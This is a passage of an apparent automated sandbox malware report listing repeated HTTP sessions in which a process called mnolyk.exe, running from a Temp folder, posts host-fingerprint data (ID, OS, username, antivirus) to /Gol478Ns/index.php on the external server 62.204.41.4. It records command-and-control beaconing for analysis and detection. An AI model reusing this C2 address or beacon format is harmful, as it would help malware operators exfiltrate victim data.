                                                                      52 | 192.168.2.7 | 49776 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:10.243724108 CET | 484 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.306922913 CET | 484 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      520 | 192.168.2.7 | 50248 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:18.734487057 CET | 980 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:18.797333956 CET | 980 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      521 | 192.168.2.7 | 50249 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:18.972465992 CET | 981 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.037753105 CET | 981 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      522 | 192.168.2.7 | 50250 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:19.214720964 CET | 982 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.280652046 CET | 982 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      523 | 192.168.2.7 | 50251 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:19.454937935 CET | 983 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.519831896 CET | 983 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      524 | 192.168.2.7 | 50252 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:19.689918995 CET | 984 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.752756119 CET | 984 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      525 | 192.168.2.7 | 50253 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:19.923434973 CET | 985 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:19.989942074 CET | 985 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      526 | 192.168.2.7 | 50254 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:20.179239988 CET | 986 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.245098114 CET | 986 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      527 | 192.168.2.7 | 50255 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:20.425504923 CET | 987 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.489131927 CET | 987 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      528 | 192.168.2.7 | 50256 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:20.656894922 CET | 988 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.720566988 CET | 988 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      529 | 192.168.2.7 | 50257 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:20.892807961 CET | 989 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.958321095 CET | 989 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      53 | 192.168.2.7 | 49777 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:10.512878895 CET | 485 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.578663111 CET | 485 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      530 | 192.168.2.7 | 50258 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:21.134136915 CET | 990 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.199671030 CET | 990 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      531 | 192.168.2.7 | 50259 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:21.378413916 CET | 991 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.441360950 CET | 991 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      532 | 192.168.2.7 | 50260 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:21.613962889 CET | 992 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.679806948 CET | 992 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      533 | 192.168.2.7 | 50261 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:21.845479965 CET | 993 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.910104036 CET | 993 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      534 | 192.168.2.7 | 50262 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:22.083151102 CET | 994 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.147461891 CET | 994 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      535 | 192.168.2.7 | 50263 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:22.311707973 CET | 995 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.375593901 CET | 995 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      536 | 192.168.2.7 | 50264 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:22.550322056 CET | 996 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.616416931 CET | 996 | IN | HTTP/1.1 200 OK
